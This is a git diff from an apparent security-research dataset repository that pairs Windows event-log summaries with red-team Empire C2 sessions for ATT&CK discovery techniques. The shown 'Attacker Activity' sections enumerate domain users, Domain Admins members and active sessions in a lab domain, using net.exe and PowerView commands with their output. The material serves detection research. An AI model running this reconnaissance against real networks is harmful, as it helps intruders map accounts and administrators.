b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain_specific.md @@ -0,0 +1,96 @@ +# Empire Net User Domain Specific + +An adversary can gather information about a specific domain user via the net.exe utility + +## Technique(s) ID + +T1087 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_net_user_domain_specific.tar.gz](./empire_net_user_domain_specific.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18230446 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|------------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 440 | +| System | Microsoft-Windows-Directory-Services-SAM | na | 42 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 361 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 87 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 24 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 8 | +| Security | Microsoft-Windows-Security-Auditing | SAM | 8 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 5 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 5 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 4 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 4 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 3 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 3 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 2 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 381 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 158 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 101 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 78 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 27 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 364 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > shell net user pgustavo /domain +[*] Tasked TKV35P8X to run TASK_SHELL +[*] Agent TKV35P8X tasked with task ID 38 +(Empire: TKV35P8X) > The request will be processed at a domain controller for domain shire.com. + +User name pgustavo +Full Name Pedro Gustavo +Comment +User's comment +Country/region code 000 (System Default) +Account active Yes +Account expires Never + +Password last set 1/14/2019 1:20:18 PM +Password expires Never +Password changeable 1/15/2019 1:20:18 PM +Password required Yes +User may change password Yes + +Workstations allowed All +Logon script +User profile +Home directory +Last logon 5/18/2019 5:32:46 PM + +Logon hours allowed All + +Local Group Memberships *SG DL shire Workstati +Global Group memberships *Domain Users *Domain Admins +The command completed successfully. + + +..Command execution completed. + +(Empire: TKV35P8X) > +``` \ No newline at end of file diff --git a/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain_specific.tar.gz b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain_specific.tar.gz new file mode 100644 index 00000000..46e64eeb Binary files /dev/null and b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain_specific.tar.gz differ diff --git a/small_datasets/windows/discovery/account_discovery_T1087/local_users/README.md b/small_datasets/windows/discovery/account_discovery_T1087/local_users/README.md deleted file mode 100644 index ef8495c1..00000000 --- a/small_datasets/windows/discovery/account_discovery_T1087/local_users/README.md +++ /dev/null @@ -1,9 +0,0 @@ -# Local Users - -An adversary can enumerate users that exist locally in the endpoint - -## Technique Variations Table - -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_net_user](./empire_net_user.md) | 2019-03-19020729 | \ No newline at end of file diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/README.md b/small_datasets/windows/discovery/permissions_group_discovery_T1069/README.md new file mode 100644 index 00000000..f0eb01df --- /dev/null +++ b/small_datasets/windows/discovery/permissions_group_discovery_T1069/README.md @@ -0,0 +1,11 @@ +# Permissions Group Discovery + +Adversaries may attempt to find local system or domain-level groups and permissions settings. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_net_local_admins](./empire_net_local_admins.md) | 2019-03-19020147 | +| shire | [empire_bloodhound](./empire_bloodhound.md) | 2019-03-19031847 | +| shire | [empire_net_domain_admins](./empire_net_domain_admins.md) | 2019-05-18201207 | \ No newline at end of file diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/README.md b/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/README.md deleted file mode 100644 index d4789a48..00000000 --- a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/README.md +++ /dev/null @@ -1,10 +0,0 @@ -# Domain Groups - -An adversary can easily enumerate members of an active directory group - -## Technique Variations Table - -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_net_domain_admins](./empire_net_domain_admins.md) | 2019-03-19014732 | -| empire | shire | [empire_net_domain_admins_restrict_sam](./empire_net_domain_admins_restrict_sam.md) | 2019-04-0301001 | \ No newline at end of file diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins.md b/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins.md deleted file mode 100644 index 90758e32..00000000 --- a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins.md +++ /dev/null @@ -1,83 +0,0 @@ - -# Empire Net Domain Admins Group - -An adversary can enumerate members of the "Domain Admins" active directory group via net.exe - -## Technique(s) ID - -T1069 - -## Creators - -Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) - -## Dataset - -[empire_net_domain_admins.gz](./empire_net_domain_admins.gz) - -## Network Environment - -Shire - -## Time Taken - -2019-03-19014732 - -## About this file - -| log_name | source_name | task | record_number | -|------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| -| Windows PowerShell | PowerShell | Pipeline Execution Details | 220 | -| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 276 | -| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 264 | -| Security | Microsoft-Windows-Security-Auditing | Group Membership | 20 | -| Security | Microsoft-Windows-Security-Auditing | Logon | 20 | -| Security | Microsoft-Windows-Security-Auditing | Process Termination | 17 | -| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 15 | -| Security | Microsoft-Windows-Security-Auditing | Logoff | 15 | -| Security | Microsoft-Windows-Security-Auditing | Process Creation | 12 | -| Security | Microsoft-Windows-Security-Auditing | Special Logon | 10 | -| Security | Microsoft-Windows-Security-Auditing | File Share | 5 | -| Security | Microsoft-Windows-Security-Auditing | SAM | 4 | -| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 3 | -| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 1 | -| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 1 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 412 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 386 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 125 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 65 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 57 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 22 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 11 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 5 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 184 | -| Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 188 | - -## Empire Activity - -``` -shell net group "Domain Admins" /domain -``` - -``` -(Empire: FD6A3MGY) > -[*] Tasked FD6A3MGY to run TASK_SHELL -[*] Agent FD6A3MGY tasked with task ID 3 -(Empire: FD6A3MGY) > The request will be processed at a domain controller for domain shire.com. - -Group name Domain Admins -Comment Designated administrators of the domain - -Members - -------------------------------------------------------------------------------- -Administrator Mmidge oda -The command completed successfully. - - -..Command execution completed. - -(Empire: FD6A3MGY) > -``` \ No newline at end of file diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins.tar.gz b/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins.tar.gz deleted file mode 100644 index 2469ef9e..00000000 Binary files a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins.tar.gz and /dev/null differ diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins_restrict_sam.tar.gz b/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins_restrict_sam.tar.gz deleted file mode 100644 index af118295..00000000 Binary files a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins_restrict_sam.tar.gz and /dev/null differ diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_bloodhound.md b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_bloodhound.md similarity index 99% rename from small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_bloodhound.md rename to small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_bloodhound.md index 21a3227f..9acdab70 100644 --- a/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_bloodhound.md +++ b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_bloodhound.md @@ -1,4 +1,3 @@ - # Empire Bloodhund An adversary can enumerate members of local groups via LDAP @@ -57,7 +56,7 @@ Shire | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 383 | | Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 745 | -## Empire Activity +## Attacker Activity ``` usemodule situational_awareness/network/bloodhound diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_bloodhound.tar.gz b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_bloodhound.tar.gz similarity index 100% rename from small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_bloodhound.tar.gz rename to small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_bloodhound.tar.gz diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domainn_admins_restrict_sam.md b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_domain_admins.md similarity index 58% rename from small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domainn_admins_restrict_sam.md rename to small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_domain_admins.md index 53053ea2..a622b482 100644 --- a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domainn_admins_restrict_sam.md +++ b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_domain_admins.md @@ -1,4 +1,3 @@ - # Empire Net Domain Admins Group An adversary can enumerate members of the "Domain Admins" active directory group via net.exe. However, if an organization restricts clients allowed to make remote calls to SAM, only specific users can enumerate users and groups in the local Security Accounts Manager (SAM) database and Active Directory. @@ -13,7 +12,7 @@ Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) ## Dataset -[empire_net_domain_admins_restrict_sam.gz](./empire_net_domain_admins_restrict_sam.gz) +[empire_net_domain_admins.tar.gz](./empire_net_domain_admins.tar.gz) ## Network Environment @@ -21,69 +20,62 @@ Shire ## Time Taken -2019-04-0301001 +2019-05-18201207 ## About this file | log_name | source_name | task | record_number | |--------------------------------------------|------------------------------------------|--------------------------------------------------------|-----------------| -| Windows PowerShell | PowerShell | Pipeline Execution Details | 266 | -| System | Microsoft-Windows-Directory-Services-SAM | na | 1 | -| System | Service Control Manager | na | 1 | -| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 4947 | -| Security | Microsoft-Windows-Security-Auditing | Other Policy Change Events | 1906 | -| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 901 | -| Security | Microsoft-Windows-Security-Auditing | MPSSVC Rule-Level Policy Change | 226 | -| Security | Microsoft-Windows-Security-Auditing | Process Creation | 90 | -| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 70 | -| Security | Microsoft-Windows-Security-Auditing | Process Termination | 41 | -| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 40 | -| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 33 | -| Security | Microsoft-Windows-Security-Auditing | Logon | 32 | -| Security | Microsoft-Windows-Security-Auditing | Group Membership | 29 | -| Security | Microsoft-Windows-Security-Auditing | User Account Management | 28 | -| Security | Microsoft-Windows-Security-Auditing | Special Logon | 22 | -| Security | Microsoft-Windows-Security-Auditing | Registry | 21 | -| Security | Microsoft-Windows-Security-Auditing | Security System Extension | 21 | -| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 20 | -| Security | Microsoft-Windows-Security-Auditing | Security Group Management | 14 | -| Security | Microsoft-Windows-Security-Auditing | Logoff | 8 | -| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 5 | -| Security | Microsoft-Windows-Security-Auditing | Kernel Object | 4 | -| Security | Microsoft-Windows-Security-Auditing | Other System Events | 3 | -| Security | Microsoft-Windows-Security-Auditing | Plug and Play Events | 3 | -| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | -| Security | Microsoft-Windows-Security-Auditing | SAM | 2 | -| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | -| Security | Microsoft-Windows-Security-Auditing | System Integrity | 1 | +| Windows PowerShell | PowerShell | Pipeline Execution Details | 146 | +| System | Microsoft-Windows-Directory-Services-SAM | na | 21 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 70 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 44 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 12 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 4 | +| Security | Microsoft-Windows-Security-Auditing | SAM | 4 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 3 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 2 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 2 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 2 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 2 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 2 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 2 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 1 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 1 | | Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 1 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 4958 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 4487 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 430 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 122 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 116 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 75 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 74 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 70 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 33 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Driver loaded (rule: DriverLoad) | 5 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 3 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 221 | -| Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 432 | - -## Empire Activity +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 236 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 65 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 35 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 35 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 13 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 119 | + +## Attacker Activity ``` -(Empire: NZB6SE34) > shell net group "Domain Admins" /domain -``` +(Empire: TKV35P8X) > shell net group "Domain Admins" /domain +[*] Tasked TKV35P8X to run TASK_SHELL +[*] Agent TKV35P8X tasked with task ID 14 +(Empire: TKV35P8X) > The request will be processed at a domain controller for domain shire.com. -``` -[*] Tasked NZB6SE34 to run TASK_SHELL -[*] Agent NZB6SE34 tasked with task ID 20 -(Empire: NZB6SE34) > The request will be processed at a domain controller for domain shire.com. +Group name Domain Admins +Comment Designated administrators of the domain + +Members + +------------------------------------------------------------------------------- +Administrator Mmidge oda +pgustavo +The command completed successfully. ..Command execution completed. -(Empire: NZB6SE34) > +(Empire: TKV35P8X) > ``` diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_domain_admins.tar.gz b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_domain_admins.tar.gz new file mode 100644 index 00000000..8ccfa68c Binary files /dev/null and b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_domain_admins.tar.gz differ diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_net_local_admins.md b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_local_admins.md similarity index 99% rename from small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_net_local_admins.md rename to small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_local_admins.md index 65f296fe..2bbd6d78 100644 --- a/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_net_local_admins.md +++ b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_local_admins.md @@ -1,4 +1,3 @@ - # Empire Net Local Administrators Group An adversary can enumerate members of the local Administratrors group via the net.exe utility @@ -55,7 +54,7 @@ Shire | Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 186 | | Microsoft-Windows-Bits-Client/Operational | Microsoft-Windows-Bits-Client | na | 2 | -## Empire Activity +## Attacker Activity ``` shell net localgroup "Administrators" diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_net_local_admins.tar.gz b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_local_admins.tar.gz similarity index 100% rename from small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_net_local_admins.tar.gz rename to small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_local_admins.tar.gz diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/README.md b/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/README.md deleted file mode 100644 index 72d43f8a..00000000 --- a/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/README.md +++ /dev/null @@ -1,10 +0,0 @@ -# Local Groups - -An adversary can easily enumerate members of a local group - -## Technique Variations Table - -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_net_local_admins](./empire_net_local_admins.md) | 2019-03-19020147 | -| empire | shire | [empire_bloodhound](./empire_bloodhound.md) | 2019-03-19031847 | \ No newline at end of file diff --git a/small_datasets/windows/discovery/system_network_connections_discovery_T1049/README.md b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/README.md new file mode 100644 index 00000000..383bf12b --- /dev/null +++ b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/README.md @@ -0,0 +1,10 @@ +# System Network Connection Discovery + +Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_get_session_dc](./empire_get_session_dc.md) | 2019-05-19005609 | +| shire | [empire_get_session_local](./empire_get_session_local.md) | 2019-05-19005224 | \ No newline at end of file diff --git a/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_dc.md b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_dc.md new file mode 100644 index 00000000..8419ee81 --- /dev/null +++ b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_dc.md @@ -0,0 +1,106 @@ +# Empire Get Session DC + +Execute the NetSessionEnum Win32API call to query a given host for active sessions on the host. + +## Technique(s) ID + +T1049 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_get_session_dc.tar.gz](./empire_get_session_dc.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-19005609 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 659 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 170 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 82 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 24 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 4 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 2 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 1 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Authentication Service | 1 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 374 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 162 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 103 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 20 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 562 | + +## Attacker Activity + +``` +(Empire: H3DKB8SA) > usemodule situational_awareness/network/powerview/get_session +(Empire: powershell/situational_awareness/network/powerview/get_session) > info + + Name: Get-NetSession + Module: powershell/situational_awareness/network/powerview/get_session + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @harmj0y + +Description: + Execute the NetSessionEnum Win32API call to query a given + host for active sessions on the host. Part of PowerView. + +Comments: + https://github.com/PowerShellMafia/PowerSploit/blob/dev/Reco + n/ + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + ComputerName False localhost The hostname or IP to query for local + group users. + Agent True H3DKB8SA Agent to run module on. + +(Empire: powershell/situational_awareness/network/powerview/get_session) > set ComputerName HFDC01 +(Empire: powershell/situational_awareness/network/powerview/get_session) > execute +[*] Tasked H3DKB8SA to run TASK_CMD_JOB +[*] Agent H3DKB8SA tasked with task ID 19 +[*] Tasked agent H3DKB8SA to run module powershell/situational_awareness/network/powerview/get_session +(Empire: powershell/situational_awareness/network/powerview/get_session) > Job started: VMY6RB + +CName UserName Time IdleTime ComputerName +----- -------- ---- -------- ------------ +\\172.18.39.106 nmartha 1 1 HFDC01 +\\172.18.39.106 pgustavo 352718 55 HFDC01 + +Get-NetSession completed! + +(Empire: powershell/situational_awareness/network/powerview/get_session) > +``` \ No newline at end of file diff --git a/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_dc.tar.gz b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_dc.tar.gz new file mode 100644 index 00000000..903c6bfb Binary files /dev/null and b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_dc.tar.gz differ diff --git a/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_local.md b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_local.md new file mode 100644 index 00000000..faee3665 --- /dev/null +++ b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_local.md @@ -0,0 +1,107 @@ +# Empire Get Sesion Local + +Execute the NetSessionEnum Win32API call to query the local host for active sessions. + +## Technique(s) ID + +T1049 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_get_session_local.tar.gz](./empire_get_session_local.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-19005224 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 811 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 191 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 144 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 28 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 15 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 13 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 13 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 13 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 11 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 7 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 6 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 5 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive 